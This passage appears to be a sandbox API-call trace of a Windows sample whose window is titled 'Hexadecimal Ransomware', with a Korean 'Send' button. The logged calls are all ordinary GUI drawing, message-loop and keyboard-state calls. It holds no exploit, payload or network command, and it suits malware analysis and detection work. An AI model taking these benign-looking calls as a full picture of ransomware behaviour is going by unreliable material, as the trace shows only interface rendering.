[0219.445] IsAppThemed () returned 0x1 [0219.445] GetThemeAppProperties () returned 0x3 [0219.445] GetThemeAppProperties () returned 0x3 [0219.445] IsAppThemed () returned 0x1 [0219.445] GetThemeAppProperties () returned 0x3 [0219.445] GetThemeAppProperties () returned 0x3 [0219.445] DrawTextExW (in: hdc=0x450107b6, lpchText="전송하기", cchText=4, lprc=0x11fe488, format=0x2415, lpdtp=0x335190c | out: lpchText="전송하기", lprc=0x11fe488) returned 13 [0219.456] IsAppThemed () returned 0x1 [0219.456] GetThemeAppProperties () returned 0x3 [0219.456] GetThemeAppProperties () returned 0x3 [0219.456] IsAppThemed () returned 0x1 [0219.456] GetThemeAppProperties () returned 0x3 [0219.456] GetThemeAppProperties () returned 0x3 [0219.456] GetFocus () returned 0x0 [0219.456] IsAppThemed () returned 0x1 [0219.456] GetThemeAppProperties () returned 0x3 [0219.456] GetThemeAppProperties () returned 0x3 [0219.456] IsAppThemed () returned 0x1 [0219.456] GetThemeAppProperties () returned 0x3 [0219.457] GetThemeAppProperties () returned 0x3 [0219.457] IsThemePartDefined () returned 0x1 [0219.457] IsAppThemed () returned 0x1 [0219.457] GetThemeAppProperties () returned 0x3 [0219.457] GetThemeAppProperties () returned 0x3 [0219.457] IsThemeBackgroundPartiallyTransparent () returned 0x1 [0219.457] IsAppThemed () returned 0x1 [0219.457] GetThemeAppProperties () returned 0x3 [0219.457] GetThemeAppProperties () returned 0x3 [0219.457] IsAppThemed () returned 0x1 [0219.457] GetThemeAppProperties () returned 0x3 [0219.457] GetThemeAppProperties () returned 0x3 [0219.457] IsThemePartDefined () returned 0x1 [0219.457] GdipCreateRegion (region=0x11fe4d0) returned 0x0 [0219.457] GdipGetClip (graphics=0x6e19d80, region=0x6e1a090) returned 0x0 [0219.457] GdipCreateMatrix (matrix=0x11fe4d0) returned 0x0 [0219.457] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a120) returned 0x0 [0219.457] GdipIsMatrixIdentity (matrix=0x6e1a120, result=0x11fe4e8) returned 0x0 [0219.457] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ae8 [0219.457] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593ae8) returned 0x0 [0219.457] LocalFree (hMem=0x1593ae8) returned 0x0 [0219.457] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ea0 [0219.458] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593ea0) returned 0x0 [0219.458] LocalFree (hMem=0x1593ea0) returned 0x0 [0219.458] GdipDeleteMatrix (matrix=0x6e1a120) returned 0x0 [0219.458] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe510) returned 0x0 [0219.458] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe500) returned 0x0 [0219.458] GdipGetRegionHRgn (region=0x6e1a090, graphics=0x6e19d80, hRgn=0x11fe500) returned 0x0 [0219.458] GdipDeleteRegion (region=0x6e1a090) returned 0x0 [0219.458] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe518) returned 0x0 [0219.458] GetCurrentObject (hdc=0x2401081f, type=0x1) returned 0xb00017 [0219.458] GetCurrentObject (hdc=0x2401081f, type=0x2) returned 0x900010 [0219.458] GetCurrentObject (hdc=0x2401081f, type=0x7) returned 0xb050815 [0219.458] GetCurrentObject (hdc=0x2401081f, type=0x6) returned 0x8a01c2 [0219.458] SaveDC (hdc=0x2401081f) returned 1 [0219.458] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x3c040825 [0219.458] GetClipRgn (hdc=0x2401081f, hrgn=0x3c040825) returned 0 [0219.458] SelectClipRgn (hdc=0x2401081f, hrgn=0x2c04081c) returned 2 [0219.458] DeleteObject (ho=0x3c040825) returned 1 [0219.459] DeleteObject (ho=0x2c04081c) returned 1 [0219.459] OffsetViewportOrgEx (in: hdc=0x2401081f, x=0, y=0, lppt=0x3351fbc | out: lppt=0x3351fbc) returned 1 [0219.459] DrawThemeParentBackground () returned 0x0 [0219.459] GetWindowPlacement (in: hWnd=0x202c8, lpwndpl=0x11fe1dc | out: lpwndpl=0x11fe1dc) returned 1 [0219.459] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe188 | out: lpRect=0x11fe188) returned 1 [0219.485] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0219.485] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0219.485] GetSystemMetrics (nIndex=42) returned 0 [0219.485] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fe030, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0219.485] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fe030) returned 0x16 [0219.485] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe090 | out: lpRect=0x11fe090) returned 1 [0219.485] GetCurrentObject (hdc=0x2401081f, type=0x1) returned 0xb00017 [0219.485] GetCurrentObject (hdc=0x2401081f, type=0x2) returned 0x900010 [0219.485] GetCurrentObject (hdc=0x2401081f, type=0x7) returned 0xb050815 [0219.485] GetCurrentObject (hdc=0x2401081f, type=0x6) returned 0x8a01c2 [0219.485] SaveDC (hdc=0x2401081f) returned 2 [0219.485] GetNearestColor (hdc=0x2401081f, color=0x0) returned 0x0 [0219.486] CreateSolidBrush (color=0x0) returned 0x27100826 [0219.486] FillRect (hDC=0x2401081f, lprc=0x11fdf30, hbr=0x27100826) returned 1 [0219.486] DeleteObject (ho=0x27100826) returned 1 [0219.486] RestoreDC (hdc=0x2401081f, nSavedDC=-1) returned 1 [0219.486] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0219.486] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0219.486] GetSystemMetrics (nIndex=42) returned 0 [0219.486] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fdfd0, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0219.486] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fdfd0) returned 0x16 [0219.486] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe030 | out: lpRect=0x11fe030) returned 1 [0219.486] GetCurrentObject (hdc=0x2401081f, type=0x1) returned 0xb00017 [0219.486] GetCurrentObject (hdc=0x2401081f, type=0x2) returned 0x900010 [0219.486] GetCurrentObject (hdc=0x2401081f, type=0x7) returned 0xb050815 [0219.486] GetCurrentObject (hdc=0x2401081f, type=0x6) returned 0x8a01c2 [0219.487] SaveDC (hdc=0x2401081f) returned 2 [0219.487] GetNearestColor (hdc=0x2401081f, color=0x0) returned 0x0 [0219.487] CreateSolidBrush (color=0x0) returned 0x28100826 [0219.487] FillRect (hDC=0x2401081f, lprc=0x11fded0, hbr=0x28100826) returned 1 [0219.487] DeleteObject (ho=0x28100826) returned 1 [0219.487] RestoreDC (hdc=0x2401081f, nSavedDC=-1) returned 1 [0219.487] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0219.487] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0219.487] GetSystemMetrics (nIndex=42) returned 0 [0219.487] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fdfd0, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0219.487] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fdfd0) returned 0x16 [0219.487] RestoreDC (hdc=0x2401081f, nSavedDC=-1) returned 1 [0219.487] GdipReleaseDC (graphics=0x6e19d80, hdc=0x2401081f) returned 0x0 [0219.487] IsAppThemed () returned 0x1 [0219.488] GetThemeAppProperties () returned 0x3 [0219.488] GetThemeAppProperties () returned 0x3 [0219.488] IsAppThemed () returned 0x1 [0219.488] GetThemeAppProperties () returned 0x3 [0219.488] GetThemeAppProperties () returned 0x3 [0219.488] IsThemePartDefined () returned 0x1 [0219.488] GdipCreateRegion (region=0x11fe454) returned 0x0 [0219.488] GdipGetClip (graphics=0x6e19d80, region=0x6e1a060) returned 0x0 [0219.488] GdipCreateMatrix (matrix=0x11fe454) returned 0x0 [0219.488] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a0f0) returned 0x0 [0219.488] GdipIsMatrixIdentity (matrix=0x6e1a0f0, result=0x11fe46c) returned 0x0 [0219.488] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ea0 [0219.488] GdipGetMatrixElements (matrix=0x6e1a0f0, matrixOut=0x1593ea0) returned 0x0 [0219.489] LocalFree (hMem=0x1593ea0) returned 0x0 [0219.489] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ae8 [0219.489] GdipGetMatrixElements (matrix=0x6e1a0f0, matrixOut=0x1593ae8) returned 0x0 [0219.489] LocalFree (hMem=0x1593ae8) returned 0x0 [0219.489] GdipDeleteMatrix (matrix=0x6e1a0f0) returned 0x0 [0219.489] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe494) returned 0x0 [0219.489] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe484) returned 0x0 [0219.489] GdipGetRegionHRgn (region=0x6e1a060, graphics=0x6e19d80, hRgn=0x11fe484) returned 0x0 [0219.489] GdipDeleteRegion (region=0x6e1a060) returned 0x0 [0219.489] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe49c) returned 0x0 [0219.489] GetCurrentObject (hdc=0x2401081f, type=0x1) returned 0xb00017 [0219.489] GetCurrentObject (hdc=0x2401081f, type=0x2) returned 0x900010 [0219.489] GetCurrentObject (hdc=0x2401081f, type=0x7) returned 0xb050815 [0219.489] GetCurrentObject (hdc=0x2401081f, type=0x6) returned 0x8a01c2 [0219.489] SaveDC (hdc=0x2401081f) returned 1 [0219.489] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x2d04081c [0219.489] GetClipRgn (hdc=0x2401081f, hrgn=0x2d04081c) returned 0 [0219.489] SelectClipRgn (hdc=0x2401081f, hrgn=0x3e040825) returned 2 [0219.490] DeleteObject (ho=0x2d04081c) returned 1 [0219.490] DeleteObject (ho=0x3e040825) returned 1 [0219.490] OffsetViewportOrgEx (in: hdc=0x2401081f, x=0, y=0, lppt=0x335297c | out: lppt=0x335297c) returned 1 [0219.490] IsAppThemed () returned 0x1 [0219.490] GetThemeAppProperties () returned 0x3 [0219.490] GetThemeAppProperties () returned 0x3 [0219.490] DrawThemeBackground () returned 0x0 [0219.490] RestoreDC (hdc=0x2401081f, nSavedDC=-1) returned 1 [0219.490] GdipReleaseDC (graphics=0x6e19d80, hdc=0x2401081f) returned 0x0 [0219.491] GdipCreateRegion (region=0x11fe458) returned 0x0 [0219.491] GdipGetClip (graphics=0x6e19d80, region=0x6e1a060) returned 0x0 [0219.491] GdipCreateMatrix (matrix=0x11fe458) returned 0x0 [0219.491] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a120) returned 0x0 [0219.491] GdipIsMatrixIdentity (matrix=0x6e1a120, result=0x11fe470) returned 0x0 [0219.491] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ae8 [0219.491] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593ae8) returned 0x0 [0219.491] LocalFree (hMem=0x1593ae8) returned 0x0 [0219.491] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ea0 [0219.491] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593ea0) returned 0x0 [0219.491] LocalFree (hMem=0x1593ea0) returned 0x0 [0219.491] GdipDeleteMatrix (matrix=0x6e1a120) returned 0x0 [0219.491] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe498) returned 0x0 [0219.491] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe488) returned 0x0 [0219.491] GdipGetRegionHRgn (region=0x6e1a060, graphics=0x6e19d80, hRgn=0x11fe488) returned 0x0 [0219.491] GdipDeleteRegion (region=0x6e1a060) returned 0x0 [0219.491] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe4a0) returned 0x0 [0219.491] GetCurrentObject (hdc=0x2401081f, type=0x1) returned 0xb00017 [0219.491] GetCurrentObject (hdc=0x2401081f, type=0x2) returned 0x900010 [0219.491] GetCurrentObject (hdc=0x2401081f, type=0x7) returned 0xb050815 [0219.491] GetCurrentObject (hdc=0x2401081f, type=0x6) returned 0x8a01c2 [0219.492] SaveDC (hdc=0x2401081f) returned 1 [0219.492] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x3f040825 [0219.492] GetClipRgn (hdc=0x2401081f, hrgn=0x3f040825) returned 0 [0219.492] SelectClipRgn (hdc=0x2401081f, hrgn=0x2e04081c) returned 2 [0219.492] DeleteObject (ho=0x3f040825) returned 1 [0219.492] DeleteObject (ho=0x2e04081c) returned 1 [0219.492] OffsetViewportOrgEx (in: hdc=0x2401081f, x=0, y=0, lppt=0x3352c50 | out: lppt=0x3352c50) returned 1 [0219.492] IsAppThemed () returned 0x1 [0219.492] GetThemeAppProperties () returned 0x3 [0219.492] GetThemeAppProperties () returned 0x3 [0219.492] GetThemeBackgroundContentRect () returned 0x0 [0219.492] RestoreDC (hdc=0x2401081f, nSavedDC=-1) returned 1 [0219.492] GdipReleaseDC (graphics=0x6e19d80, hdc=0x2401081f) returned 0x0 [0219.492] IsAppThemed () returned 0x1 [0219.492] GetThemeAppProperties () returned 0x3 [0219.492] GetThemeAppProperties () returned 0x3 [0219.492] GdipGetTextRenderingHint (graphics=0x6e19d80, mode=0x11fe5d4) returned 0x0 [0219.492] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe5c0) returned 0x0 [0219.493] GetCurrentObject (hdc=0x2401081f, type=0x1) returned 0xb00017 [0219.493] GetCurrentObject (hdc=0x2401081f, type=0x2) returned 0x900010 [0219.493] GetCurrentObject (hdc=0x2401081f, type=0x7) returned 0xb050815 [0219.493] GetCurrentObject (hdc=0x2401081f, type=0x6) returned 0x8a01c2 [0219.493] SaveDC (hdc=0x2401081f) returned 1 [0219.493] GetTextAlign (hdc=0x2401081f) returned 0x0 [0219.493] GetTextColor (hdc=0x2401081f) returned 0x0 [0219.493] GetCurrentObject (hdc=0x2401081f, type=0x6) returned 0x8a01c2 [0219.493] GetObjectW (in: h=0x8a01c2, c=92, pv=0x11fe308 | out: pv=0x11fe308) returned 92 [0219.493] SelectObject (hdc=0x2401081f, h=0x170a07ff) returned 0x8a01c2 [0219.493] GetBkMode (hdc=0x2401081f) returned 2 [0219.493] SetBkMode (hdc=0x2401081f, mode=1) returned 2 [0219.494] DrawTextExW (in: hdc=0x2401081f, lpchText="전송하기", cchText=4, lprc=0x11fe3f0, format=0x2415, lpdtp=0x3352ff0 | out: lpchText="전송하기", lprc=0x11fe3f0) returned 13 [0219.497] DrawTextExW (in: hdc=0x2401081f, lpchText="전송하기", cchText=4, lprc=0x11fe554, format=0x2015, lpdtp=0x3352ff0 | out: lpchText="전송하기", lprc=0x11fe554) returned 13 [0219.499] RestoreDC (hdc=0x2401081f, nSavedDC=-1) returned 1 [0219.499] GdipReleaseDC (graphics=0x6e19d80, hdc=0x2401081f) returned 0x0 [0219.499] GetFocus () returned 0x0 [0219.499] IsAppThemed () returned 0x1 [0219.499] GetThemeAppProperties () returned 0x3 [0219.499] GetThemeAppProperties () returned 0x3 [0219.499] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe7a0) returned 0x0 [0219.499] BitBlt (hdc=0x60100ce, x=0, y=0, cx=64, cy=25, hdcSrc=0x2401081f, x1=0, y1=0, rop=0xcc0020) returned 1 [0219.500] GdipReleaseDC (graphics=0x6e19d80, hdc=0x2401081f) returned 0x0 [0219.500] SelectPalette (hdc=0x60100ce, hPal=0x88000b, bForceBkgd=0) returned 0x1808081b [0219.500] SelectObject (hdc=0x2401081f, h=0x85000f) returned 0xb050815 [0219.500] DeleteDC (hdc=0x2401081f) returned 1 [0219.500] GdipDeleteGraphics (graphics=0x6e19d80) returned 0x0 [0219.500] EndPaint (hWnd=0x102d8, lpPaint=0x11fe744) returned 1 [0219.500] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0219.500] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0219.500] WaitMessage () returned 1 [0219.501] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0219.501] IsWindowUnicode (hWnd=0x202e6) returned 1 [0219.501] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0219.501] TranslateMessage (lpMsg=0x11fed00) returned 0 [0219.501] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0219.503] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0219.503] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0219.503] WaitMessage () returned 1 [0219.522] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0219.522] GetMessageA (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0219.522] TranslateMessage (lpMsg=0x11fed00) returned 0 [0219.522] DispatchMessageA (lpMsg=0x11fed00) returned 0x0 [0219.522] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0219.523] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0219.523] WaitMessage () returned 1 [0219.742] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0219.742] IsWindowUnicode (hWnd=0x102ea) returned 1 [0219.742] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0219.742] TranslateMessage (lpMsg=0x11fed00) returned 0 [0219.742] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0219.742] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0219.742] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0219.742] WaitMessage () returned 1 [0219.824] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0219.824] IsWindowUnicode (hWnd=0x202e6) returned 1 [0219.824] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0219.824] TranslateMessage (lpMsg=0x11fed00) returned 0 [0219.824] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0219.826] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0219.827] IsWindowUnicode (hWnd=0x202e6) returned 1 [0219.827] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0219.827] TranslateMessage (lpMsg=0x11fed00) returned 0 [0219.827] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0219.827] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0219.827] IsWindowUnicode (hWnd=0x202e6) returned 1 [0219.827] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0219.827] TranslateMessage (lpMsg=0x11fed00) returned 0 [0219.827] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0219.827] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0219.827] IsWindowUnicode (hWnd=0x202e6) returned 1 [0219.827] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0219.828] TranslateMessage (lpMsg=0x11fed00) returned 0 [0219.828] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0219.828] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0219.828] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0219.828] WaitMessage () returned 1 [0239.661] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0239.664] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x46, wParam=0x0, lParam=0x11febd4) returned 0x0 [0239.671] GetWindowPlacement (in: hWnd=0x202c8, lpwndpl=0x11fe900 | out: lpwndpl=0x11fe900) returned 1 [0239.671] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x47, wParam=0x0, lParam=0x11febd4) returned 0x0 [0239.672] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe8b0 | out: lpRect=0x11fe8b0) returned 1 [0239.672] GetWindowRect (in: hWnd=0x202c8, lpRect=0x11fe8b0 | out: lpRect=0x11fe8b0) returned 1 [0239.674] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x1c, wParam=0x1, lParam=0xca4) returned 0x0 [0239.674] NtdllDefWindowProc_W (hWnd=0x202c6, Msg=0x1c, wParam=0x1, lParam=0xca4) returned 0x0 [0239.674] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x86, wParam=0x1, lParam=0x0) returned 0x1 [0239.700] GetFocus () returned 0x0 [0239.700] SetFocus (hWnd=0x102d8) returned 0x0 [0239.703] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x281, wParam=0x1, lParam=0xc000000f) returned 0x0 [0239.705] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0239.705] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x282, wParam=0x2, lParam=0x0) returned 0x0 [0239.706] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0239.707] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x7, wParam=0x0, lParam=0x0) returned 0x0 [0239.707] GetStockObject (i=5) returned 0x900015 [0239.707] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0239.708] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0xd, wParam=0x5, lParam=0x1591b58) returned 0x4 [0239.708] GetDlgItem (hDlg=0x202c8, nIDDlgItem=66264) returned 0x102d8 [0239.708] SendMessageW (hWnd=0x102d8, Msg=0x202b, wParam=0x102d8, lParam=0x11fe234) returned 0x0 [0239.708] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x202b, wParam=0x102d8, lParam=0x11fe234) returned 0x0 [0239.709] InvalidateRect (hWnd=0x102d8, lpRect=0x0, bErase=0) returned 1 [0239.718] IsWindowUnicode (hWnd=0x102d8) returned 1 [0239.718] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0239.719] GetKeyState (nVirtKey=16) returned 0 [0239.719] GetKeyState (nVirtKey=17) returned 0 [0239.719] GetKeyState (nVirtKey=18) returned -128 [0239.719] TranslateMessage (lpMsg=0x11fed00) returned 1 [0239.719] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0239.719] GetKeyState (nVirtKey=16) returned 0 [0239.719] GetKeyState (nVirtKey=17) returned 0 [0239.719] GetKeyState (nVirtKey=18) returned -128 [0239.720] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x105, wParam=0x1b, lParam=0xe0010001) returned 0x0 [0239.720] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0239.720] IsWindowUnicode (hWnd=0x102d8) returned 1 [0239.720] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0239.720] GetKeyState (nVirtKey=16) returned 0 [0239.720] GetKeyState (nVirtKey=17) returned 0 [0239.720] GetKeyState (nVirtKey=18) returned 0 [0239.720] TranslateMessage (lpMsg=0x11fed00) returned 1 [0239.720] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0239.720] GetKeyState (nVirtKey=16) returned 0 [0239.721] GetKeyState (nVirtKey=17) returned 0 [0239.721] GetKeyState (nVirtKey=18) returned 0 [0239.721] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x101, wParam=0x12, lParam=0xc0380001) returned 0x0 [0239.721] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0239.722] IsWindowUnicode (hWnd=0x102d8) returned 1 [0239.722] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0239.722] TranslateMessage (lpMsg=0x11fed00) returned 0 [0239.722] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0239.722] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0239.724] IsWindowUnicode (hWnd=0x102d8) returned 1 [0239.724] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0239.724] TranslateMessage (lpMsg=0x11fed00) returned 0 [0239.724] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0239.725] BeginPaint (in: hWnd=0x102d8, lpPaint=0x11fe748 | out: lpPaint=0x11fe748) returned 0x60100ce [0239.725] SelectPalette (hdc=0x60100ce, hPal=0x1808081b, bForceBkgd=1) returned 0x88000b [0239.725] CreateCompatibleDC (hdc=0x60100ce) returned 0x8501082e [0239.726] SelectObject (hdc=0x8501082e, h=0xb050815) returned 0x85000f [0239.726] GdipCreateFromHDC (hdc=0x8501082e, graphics=0x11fe760) returned 0x0 [0239.728] GdipTranslateWorldTransform (graphics=0x6e19d80, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0239.728] GdipSetClipRectI (graphics=0x6e19d80, x=0, y=0, width=64, height=25, combineMode=0x0) returned 0x0 [0239.728] GdipCreateMatrix (matrix=0x11fe7a8) returned 0x0 [0239.728] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a060) returned 0x0 [0239.728] GdipIsMatrixIdentity (matrix=0x6e1a060, result=0x11fe7c0) returned 0x0 [0239.728] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ae8 [0239.728] GdipGetMatrixElements (matrix=0x6e1a060, matrixOut=0x1593ae8) returned 0x0 [0239.729] LocalFree (hMem=0x1593ae8) returned 0x0 [0239.729] GdipDeleteMatrix (matrix=0x6e1a060) returned 0x0 [0239.729] GdipCreateRegion (region=0x11fe7a8) returned 